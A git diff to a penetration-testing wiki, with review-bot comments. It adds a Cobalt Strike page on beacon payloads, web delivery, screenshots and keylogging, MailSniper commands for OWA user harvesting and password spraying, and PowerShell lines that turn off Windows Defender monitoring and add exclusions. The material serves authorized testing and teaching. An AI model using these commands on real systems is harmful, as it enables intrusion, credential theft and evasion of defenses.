diff --git a/SUMMARY.md b/SUMMARY.md index 7d4ceeb45..40971df76 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -639,6 +639,7 @@ * [Empire](backdoors/empire.md) * [Salseo](backdoors/salseo.md) * [ICMPsh](backdoors/icmpsh.md) +* [Cobalt Strike](c2/cobalt-strike.md) ## ✍ TODO diff --git a/c2/cobalt-strike.md b/c2/cobalt-strike.md new file mode 100644 index 000000000..1e3c31040 --- /dev/null +++ b/c2/cobalt-strike.md @@ -0,0 +1,42 @@ +# Cobalt Strike + +### Listeners + +Cobalt Strike -> Listeners -> Add/Edit then you can select where to listen, which kind of beacon to use (http, dns, smb...) and more + +### Generate & Host payloads + +#### Generate payloads in files + +Attacks -> Packages -> + +* **`HTMLApplication`** for HTA files +* **`MS Office Macro`** for an office document with a macro +* **`Windows Executable`** for a .exe, .dll orr service .exe +* **`Windows Executable (S)`** for a **stageless** .exe, .dll or service .exe (better stageless than staged, less IoCs) + +#### Generate & Host payloads + +A`ttacks -> Web Drive-by -> Scripted Web Delivery (S)` This will generate a script/executable to download the beacon from cobalt strike in formats such as: bitsadmin, exe, powershell and python + +#### Host Payloads + +If you already has the file you want to host in a web sever just go to `Attacks -> Web Drive-by -> Host File` and select the file to host and web server config. + +### Beacon Options + +```bash +# Execute local .NET binary +execute-assembly + + +# Screenshots +printscreen # Take a single screenshot via PrintScr method +screenshot # Take a single screenshot +screenwatch # Take periodic screenshots of desktop +## Go to View -> Screenshots to see them + +# keylogger +keylogger [pid] [x86|x64] +## View > Keystrokes to see the keys pressed +``` diff --git a/windows-hardening/active-directory-methodology/README.md b/windows-hardening/active-directory-methodology/README.md index 1c4bc6c62..298a0fd89 100644 
--- a/windows-hardening/active-directory-methodology/README.md +++ b/windows-hardening/active-directory-methodology/README.md @@ -91,6 +91,28 @@ msf> use auxiliary/gather/kerberos_enumusers crackmapexec smb dominio.es -u '' -p '' --users | awk '{print $4}' | uniq ``` +{% hint style="warning" %} +You can find lists of usernames in [**this github repo**](https://github.com/danielmiessler/SecLists/tree/master/Usernames/Names). + +However, you should have the **name of the people working on the company** from the recon step you should have performed before this. With the name and surname you could used the script [**namemash.py**](https://gist.github.com/superkojiman/11076951) **** to generate potential valid usernames. +{% endhint %} + +#### **OWA (Outlook Web Access) Server** + +If you found one of these servers in the network you can also perform **user enumeration against it**. For example, you could use the tool [**MailSniper**](https://github.com/dafthack/MailSniper): + +```bash +ipmo C:\Tools\MailSniper\MailSniper.ps1 +# Get info about the domain +Invoke-DomainHarvestOWA -ExchHostname [ip] +# Enumerate valid users from a list of potential usernames +Invoke-UsernameHarvestOWA -ExchHostname [ip] -Domain [domain] -UserList .\possible-usernames.txt -OutFile valid.txt +# Password spraying +Invoke-PasswordSprayOWA -ExchHostname [ip] -UserList .\valid.txt -Password Summer2021 +# Get addresses list from the compromised mail +Get-GlobalAddressList -ExchHostname [ip] -UserName [domain]\[username] -Password Summer2021 -OutFile gal.txt +``` + ### Knowing one or several usernames Ok, so you know you have already a valid username but no passwords... Then try: diff --git a/windows-hardening/basic-powershell-for-pentesters/README.md b/windows-hardening/basic-powershell-for-pentesters/README.md index f3e4c750e..105233393 100644 --- a/windows-hardening/basic-powershell-for-pentesters/README.md +++ b/windows-hardening/basic-powershell-for-pentesters/README.md 
@@ -176,16 +176,14 @@ Get-NetConnectionProfile | } ``` -## Disable Defender +## Antivirus ```bash -# Check status +#Check status Get-MpComputerStatus -# Disable +#Disable Set-MpPreference -DisableRealtimeMonitoring $true -#To completely disable Windows Defender on a computer, use the command: -New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force -# Set exclusion path +#Set exclusion path Add-MpPreference -ExclusionPath "C:\users\public\documents\magichk" ```
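Review bot: in the SUMMARY.md hunk, the new entry `* [Cobalt Strike](c2/cobalt-strike.md)` is appended to the backdoors list (Empire, Salseo, ICMPsh) while the page itself is created under a new `c2/` directory; either add a C2 heading in SUMMARY.md for it or keep the file next to the others in `backdoors/`, so the sidebar and the directory layout agree.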
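Review bot: in the new `c2/cobalt-strike.md`, the inline code at `A`ttacks -> Web Drive-by -> Scripted Web Delivery (S)` has the opening backtick after the `A`, so it renders broken; it should read `` `Attacks -> Web Drive-by -> Scripted Web Delivery (S)` ``. Same file: `.exe, .dll orr service .exe` (orr), and `If you already has the file you want to host in a web sever` should be `If you already have ... web server`. In the beacon block, `execute-assembly` is listed with no argument; the command takes the local assembly path and its arguments (`execute-assembly /path/to/file.exe [arguments]`), and the line `keylogger [pid] [x86|x64]` should say that `pid` is the process the keylogger is injected into and `x86|x64` its architecture, otherwise the placeholders are not self-explanatory.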
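Review bot: in the active-directory-methodology hunk, `With the name and surname you could used the script` should be `could use`, and the stray `**** ` after the namemash.py link is leftover bold markup that renders as literal asterisks. More importantly, `Invoke-PasswordSprayOWA -ExchHostname [ip] -UserList .\valid.txt -Password Summer2021` follows the user harvest with no mention of the domain lockout policy; a one-line warning to check the lockout threshold and observation window before spraying (for example `net accounts /domain` once any credential is available, or one password per observation window) would keep readers from locking out the accounts they just enumerated. Minor: `ipmo` is the alias for `Import-Module`; spelling it out reads better in a tutorial.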
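Review bot: in the basic-powershell-for-pentesters hunk, the `DisableAntiSpyware` registry line is removed with no rationale on the page or in a commit message; if the reason is that Defender has ignored that value since the August 2020 platform update when tamper protection is enabled, a short sentence saying so would stop readers from adding it back. The heading change from `## Disable Defender` to `## Antivirus` also broadens the section while the block still only covers Defender cmdlets (`Get-MpComputerStatus`, `Set-MpPreference`, `Add-MpPreference`); either keep Defender in the heading or note that these apply to Defender only, and note that `Set-MpPreference -DisableRealtimeMonitoring $true` needs local admin and is likewise blocked by tamper protection. The `# Check status` -> `#Check status` comment spacing changes are cosmetic churn.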